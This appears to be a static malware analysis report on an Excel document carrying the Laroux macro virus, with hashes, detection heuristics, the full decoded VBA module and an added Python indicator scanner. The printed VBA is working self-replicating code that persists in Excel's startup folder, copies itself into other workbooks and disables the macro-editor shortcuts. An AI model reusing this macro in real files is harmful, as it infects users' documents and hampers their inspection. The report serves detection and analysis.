Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 65489052084c2fad…

MALICIOUS

Office (OLE)

Size: 359.5 KB | Created: 2011-02-10 10:33:56 | First seen: 2015-09-17
MD5: 1aaceac73c49dbcf0ac2c393fe1b3800
SHA-1: 788712b5c9f432497c9645b89f5a58c67921a8a2
SHA-256: 65489052084c2fad48673188a072b4e88524966e7530f055df2e14751207352a
Risk score: 88

Malware Insights

MITRE ATT&CK: T1059.005 Command and Scripting Interpreter: Visual Basic

The sample contains VBA macros, including an auto_open subroutine, which Excel runs as soon as the workbook is opened. When the macro is running from a workbook outside Excel's startup folder and StartUp.xls is not already there, it copies its own module sheet ("StartUp") into a new workbook and saves it as StartUp.xls in Application.StartupPath (the XLSTART directory), so the code is loaded at every later Excel launch. It then sets Application.OnSheetActivate to StartUp.xls!ycop, a handler that copies the StartUp sheet into any workbook the user activates that does not already carry it, which is how the macro spreads to other documents, and rebinds Alt+F11 and Alt+F8 (the VBA editor and Macro dialog shortcuts) to a macro named escape, so neither shortcut reaches its built-in action. Note that escape is not defined in the carved module, and every routine runs under On Error Resume Next, so any failure, including a missing handler, is swallowed silently. The document body contains financial data tables, likely a lure to disguise the malicious macro.

Heuristics (3)

  • ClamAV: Doc.Macro.Laroux-5893719-0 [critical] CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Macro.Laroux-5893719-0
  • VBA macros detected [medium] OLE_VBA_MACROS (1 related finding)
    Document contains VBA macro code
  • Auto_Open macro [low] OLE_VBA_AUTO
    Auto_Open macro; matched line in script: Sub auto_open()

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 945 bytes
SHA-256: e6a1b81a4a548e8f5cc6a7b0474d869c6f895739d5cb3b202f7eb790f51fd80c

Script preview (first 1,000 lines of the extracted script; this 945-byte module is 26 lines, so it is shown in full):
Attribute VB_Name = "StartUp"
Sub auto_open()
  On Error Resume Next
  If ThisWorkbook.Path <> Application.StartupPath And Dir(Application.StartupPath & "\" & "StartUp.xls") = "" Then
    Application.ScreenUpdating = True
    ThisWorkbook.Sheets("StartUp").Copy
    ActiveWorkbook.SaveAs (Application.StartupPath & "\" & "StartUp.xls")
    n$ = ActiveWorkbook.Name
    ActiveWindow.Visible = False
    Workbooks("StartUp.xls").Save
    'Workbooks(n$).Close (true)
  End If
  Application.OnSheetActivate = "StartUp.xls!ycop"
  Application.EnableEvents = True
  Application.OnKey "%{F11}", "StartUp.xls!escape"
  Application.OnKey "%{F8}", "StartUp.xls!escape"
End Sub

Sub ycop()
  On Error Resume Next
  If ActiveWorkbook.Sheets(1).Name <> "StartUp" Then
    Application.ScreenUpdating = True
    n$ = ActiveSheet.Name
    Workbooks("StartUp.xls").Sheets("StartUp").Copy before:=Worksheets(1)
    End If
End Sub
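To turn the behaviour described under Malware Insights into a repeatable check, the following is an added example (not part of this report and not code from oletools or ClamAV) that scans decoded VBA source such as the macros.bas module above for the indicators this sample exhibits: auto-exec entry points, writes to the Excel startup folder, Application.On* event hooks, OnKey rebinding of Alt+F11/Alt+F8, and cross-workbook macro references whose target procedure is not defined in the module. The indicator lists, regular expressions and function names are this example's own assumptions; the embedded input is the carved module copied from the preview above.

```python
import re
from typing import Dict

# Constructed input for this example: the VBA source carved from the sample
# (macros.bas above), embedded verbatim so the scanner runs offline.
SAMPLE_VBA = r'''Attribute VB_Name = "StartUp"
Sub auto_open()
  On Error Resume Next
  If ThisWorkbook.Path <> Application.StartupPath And Dir(Application.StartupPath & "\" & "StartUp.xls") = "" Then
    Application.ScreenUpdating = True
    ThisWorkbook.Sheets("StartUp").Copy
    ActiveWorkbook.SaveAs (Application.StartupPath & "\" & "StartUp.xls")
    n$ = ActiveWorkbook.Name
    ActiveWindow.Visible = False
    Workbooks("StartUp.xls").Save
    'Workbooks(n$).Close (true)
  End If
  Application.OnSheetActivate = "StartUp.xls!ycop"
  Application.EnableEvents = True
  Application.OnKey "%{F11}", "StartUp.xls!escape"
  Application.OnKey "%{F8}", "StartUp.xls!escape"
End Sub

Sub ycop()
  On Error Resume Next
  If ActiveWorkbook.Sheets(1).Name <> "StartUp" Then
    Application.ScreenUpdating = True
    n$ = ActiveSheet.Name
    Workbooks("StartUp.xls").Sheets("StartUp").Copy before:=Worksheets(1)
    End If
End Sub
'''

# Procedure names Office runs without user interaction (VBA names are case-insensitive).
# This list is the example's own assumption, not taken from the report.
AUTO_EXEC_NAMES = {"auto_open", "auto_close", "autoopen", "autoclose", "autoexec",
                   "workbook_open", "document_open"}
# Shortcuts an analyst relies on: Alt+F11 opens the VBA editor, Alt+F8 the Macro dialog.
ANALYSIS_KEYS = {"%{F11}", "%{F8}"}

SUB_RE = re.compile(r"^\s*(?:Public\s+|Private\s+)?(?:Sub|Function)\s+(\w+)", re.IGNORECASE)
MACRO_REF_RE = re.compile(r'"([^"!]+)!(\w+)"')      # "Book.xls!proc" cross-workbook reference
ONKEY_RE = re.compile(r'Application\.OnKey\s+"([^"]+)"\s*,\s*"([^"]+)"', re.IGNORECASE)
EVENT_HOOK_RE = re.compile(r"Application\.On(?!Key\b)\w+\s*=", re.IGNORECASE)  # OnSheetActivate etc.
STARTUP_DIR_RE = re.compile(r"StartupPath|AltStartupPath|XLSTART", re.IGNORECASE)
WRITE_RE = re.compile(r"\.SaveAs\b|\.SaveCopyAs\b|\.Copy\b", re.IGNORECASE)


def scan_vba(source: str) -> Dict[str, list]:
    """Return indicator hits keyed by category; each hit carries its 1-based line number."""
    findings: Dict[str, list] = {
        "auto_exec": [], "startup_persistence": [], "event_hooks": [],
        "key_rebinds": [], "unresolved_macros": [],
    }
    defined = set()      # procedures declared in this module (lower-cased)
    referenced = {}      # proc name -> (first line, workbook it is looked up in)
    for lineno, raw in enumerate(source.splitlines(), 1):
        line = raw.strip()
        if line.startswith("'"):
            continue  # VBA comment, never executed
        m = SUB_RE.match(line)
        if m:
            name = m.group(1).lower()
            defined.add(name)
            if name in AUTO_EXEC_NAMES:
                findings["auto_exec"].append((lineno, line))
        # A save or copy that names the startup folder on the same line is a persistence write;
        # a bare Dir(Application.StartupPath ...) existence check is not flagged.
        if STARTUP_DIR_RE.search(line) and WRITE_RE.search(line):
            findings["startup_persistence"].append((lineno, line))
        if EVENT_HOOK_RE.search(line):
            findings["event_hooks"].append((lineno, line))
        km = ONKEY_RE.search(line)
        if km and km.group(1) in ANALYSIS_KEYS:
            findings["key_rebinds"].append((lineno, km.group(1), km.group(2)))
        for book, proc in MACRO_REF_RE.findall(line):
            referenced.setdefault(proc.lower(), (lineno, book))
    # A referenced procedure that no Sub/Function in this module declares either lives in
    # another module or is a dead reference; either way it deserves a look.
    for proc, (lineno, book) in sorted(referenced.items()):
        if proc not in defined:
            findings["unresolved_macros"].append((lineno, f"{book}!{proc}"))
    return findings


def is_suspicious(findings: Dict[str, list]) -> bool:
    """Auto-exec code that also persists, hooks application events or blocks inspection."""
    return bool(findings["auto_exec"]) and any(
        findings[k] for k in ("startup_persistence", "event_hooks", "key_rebinds"))


if __name__ == "__main__":
    hits = scan_vba(SAMPLE_VBA)
    for category, items in hits.items():
        print(f"{category}: {len(items)}")
        for item in items:
            print("   ", item)
    print("suspicious:", is_suspicious(hits))
```

Against the module above the scanner reports the auto_open entry point, the SaveAs into Application.StartupPath, the OnSheetActivate hook, both OnKey rebinds, and StartUp.xls!escape as a reference with no matching procedure. For real triage, feed it the decoded source olevba emits rather than the embedded constant.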